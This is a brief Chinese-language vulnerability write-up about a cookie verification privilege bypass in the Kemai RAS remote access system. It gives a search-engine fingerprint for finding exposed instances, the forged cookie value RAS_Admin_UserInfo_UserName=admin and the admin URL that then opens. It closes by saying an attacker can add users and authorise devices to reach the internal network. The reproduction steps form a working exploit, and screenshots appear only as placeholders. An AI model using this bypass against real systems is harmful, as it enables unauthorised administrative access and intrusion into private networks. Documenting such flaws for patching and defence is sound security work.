跳转至

科迈 RAS系统 Cookie验证越权漏洞

漏洞描述

科迈 RAS系统 存在Cookie验证越权,当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台

漏洞影响

科迈 RAS系统

网络测绘

app="科迈-RAS系统"

漏洞复现

登录页面如下

img

添加Cookie

RAS_Admin_UserInfo_UserName=admin

img

访问 /Server/CmxUser.php?pgid=UserList

img

获取后可以添加用户,授权登陆设备直接接入内网